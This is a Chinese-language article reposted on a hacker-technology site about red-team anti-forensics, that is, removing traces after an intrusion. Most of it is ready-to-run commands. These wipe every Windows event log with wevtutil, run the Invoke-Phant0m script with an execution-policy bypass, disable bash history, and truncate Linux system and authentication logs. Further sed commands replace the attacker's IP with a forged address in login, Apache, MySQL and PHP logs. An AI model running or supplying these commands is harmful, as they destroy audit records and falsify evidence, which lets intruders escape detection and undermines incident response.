记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

红队痕迹清理之入侵日志处理

2021-12-15 17:36

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

前言

在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。在蓝队的溯源中,攻击者的攻击路径都将记录在日志中,所遗留的工具也会被蓝队进行分析,在工具中可以查找特征,红队自研工具更容易留下蛛丝马迹。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉,以防被溯源在演练中失分。

 Windows日志处理

Windows事件日志不同EVENT ID代表的不同意义

Windows日志管理工具wevtutil.exe

wevtutil搭配for循环清除所有日志

for /F "tokens=*" %a in ('wevtutil.exe el') DO wevtutil.exe cl "%a"

Powershell批量删日志

wevtutil el | Foreach-Object {Write-Host "Clearing $_"; wevtutil cl "$_"}

加载运行powershell脚本删除日志

powershell –exec bypass –Command "& {Import-Module 'C:\Invoke-Phant0m.ps1';Invoke-Phant0m}"github

地址:https://github.com/gouduyao/Invoke-Phant0m

Linux日志处理

  • Bash日志处理

bash去掉history记录,让系统不记录历史操作命令(使用较少)

export HISTSIZE=0export HISTFILE=/dev/null

history命令的清除

history -c  # 删除内存中的所有命令历史history -r  # 删除当前会话历史记录
  • 系统日志

一键清理日志bash脚本

# !/usr/bin/bashecho > /var/log/syslogecho > /var/log/messagesecho > /var/log/httpd/access_logecho > /var/log/httpd/error_logecho > /var/log/xferlogecho > /var/log/secureecho > /var/log/auth.logecho > /var/log/user.logecho > /var/log/wtmpecho > /var/log/lastlogecho > /var/log/btmpecho > /var/run/utmprm ~/./bash_historyhistory -c

使用sed伪造日志或定向删除

# 192.168.100.101为攻击者IP,10.0.0.55为伪造IP,-i编辑文件sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/btmp*sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/lastlogsed 's/192.168.100.101/10.0.0.55/g' -i /var/log/wtmpsed 's/192.168.100.101/10.0.0.55/g' -i securesed 's/192.168.100.101/10.0.0.55/g' -i /var/log/utmp

由于日志文件偏多这里建议如上编辑为bash脚本一键清理

web日志同样可以使用sed进行伪造,例如apache日志、MySQL日志、php日志

sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/access.logsed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/error_log
sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_error.logsed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_slow.log
sed 's/192.168.100.101/192.168.1.4/g' –i /var/log/apache/php_error.log

知识来源: https://www.wangan.com/p/7fy7479e99425904

阅读:498866 | 评论:0 | 标签:入侵 红队 日志

想收藏或者和大家分享这篇好文章→复制链接地址

“红队痕迹清理之入侵日志处理”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

客黑业创的万千入年个一

❤用费0款退球星,年1期效有员会

🧠富财控掌,知认升提,长成起一💡

标签云 ☁

本页关键词 💎